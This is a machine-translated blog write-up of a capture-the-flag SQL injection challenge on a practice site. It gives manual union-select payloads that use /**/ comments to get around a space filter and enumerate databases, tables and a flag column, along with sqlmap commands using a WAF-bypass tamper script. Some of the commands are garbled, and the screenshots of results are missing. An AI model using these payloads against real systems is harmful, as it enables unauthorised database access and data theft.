Simple SQL injection-Experiment Bar

Just done the experiment, and now tidy up.

Write a solution to the problem, hoping to help those who need help.

All WP is written in a single article of the form

The main purpose is to enable readers to read and find better,

I hope you don't blame!! Share!!!

Always love your ———— new baby

Simple SQL injection Score: 10

• Source: Experiment Bar
• Difficulty: Medium
• Number of participants: 18007 people
• Get flag:5644 People
• Number of respondents: 6513 people
• Problem solving pass rate: 87%

Get the flag value by injection (Submission format: flag{}).

Problem Solving Links: http://ctf5.shiyanbar.com/423/web/

Problem-Solving ideas: This topic covers not a lot of content, but also let me have some progress (after all, I am still new!!) ）

I used two methods to solve this problem (I hope you can get some ideas)

The first method:

First: Do a simple manual injection:

1 and 1=1, usually this situation returns the data normally

1 and 1=2, usually this situation will not return data or direct error

Or

1 ' and ' 1 ' = ' 1, normally this situation returns data normally

1 ' and ' 1 ' = ' 2, usually this situation does not return data or direct error

Analysis:
If the SQL statement that handles the data in the background (the background adds single quotes to the input) is:

select name from user where id=‘our_input‘

we enter 1 ' and ' 1 ' = ' 1,sql statements into:

select name from user where id=‘1‘ and ‘1‘=‘1‘        后台数据库仍然正常读取数据        我们输入1’ and ‘1’=’2，sql语句变为：

select name from user where id=‘1‘ and ‘1‘=‘2‘

If the
query condition is false, the database cannot read the data.

Based on the above method of injection, we first use 1and 1=1

How to 1 and 1=1 '

There was an error, and then we re-enter: 1and 1=1

You will find that and is filtered and the space is replaced with a +, so we can infer that this problem filters out common SQL commands,

You can enter the union and select from to test and find that it's all filtered out.

This time we need to know: When the grid is filtered, usually () or/**/instead of spaces

Then we can choose to explode the vault:

1 '/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/' 1 ' = ' 1

　　

You will get:

Look for the table again:

1 '/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/' 1 ' = ' 1

　　

A table with flag is found, and Kai Sen continues to explode flag:

1'/**/union/**/select/**/column_name/**/from/**/information_schema.columns/**/where/**/' 1'='1

However there was a mistake (QAQ)

So let's look directly at its contents:

1'/**/union/**/select/**/flag/**/from/**/flag/**/where/**/'1'= '1

You will get:

The second method:

It's also possible to use Sqlmap.

Here we will use the tamper, is written in Python, Sqlmap generally comes with, the main role is to bypass the WAF, the space is filtered can use space2comment.py,

The filter system is case sensitive and can use randomcase.py and so on.
The level parameter used here is the class that performs the test (1-5, which defaults to 1), and sqlmap tests all the Get and post parameters by default, and when the value of –level is greater than or equal to 2

The value of the HTTP cookie header is tested, and the value of the User-agent and HTTP Referer headers is also tested when it is greater than or equal to 3

First explosion of the library:

" http://ctf5.shiyanbar.com/web/index_2.php?id=1 " --tamper=space2comment--dbs

Where: 1.sqlmap: Start Sqlmap. 2.-u: parameter refers to the URL of the destination. 3.--tamper: Bypasses the WAF script.

One of the 4.space2comment:tamper scripts is used to bypass filter spaces. 5.--dbs Enumerating databases

Then look in the WEB1 database:

" http://ctf5.shiyanbar.com/web/index_2.php?id=1 " --tamper=space2comment-d web1--table

Where: 1.-d: Back with the database name. 2.--tables: Enumerating tables in a library

Then continue looking in the flag table

" http://ctf5.shiyanbar.com/web/index_2.php?id=1 " --tamper=space2comment-d web1-t flag--colum

Where: 1.-t: Back with the table name. 2.--column listing column names in a table

The final result will be as you proceed:

Where: 1.-c followed by the name of the column. 2.--dump remove all records from the form

If there is anything do not understand the place, leave a message or add me!!!
I am very food, so I will work hard!
Effort is because do not want to let the person who cares for disappointment!
Bo Master collation is not easy, if like to recommend attention Bo Master Oh!

Bloggers like to make friends. Below is my contact information:
qq:1263030049

: liu1263030049
Please specify the reason before adding a friend thank you

Simple SQL injection-Experiment Bar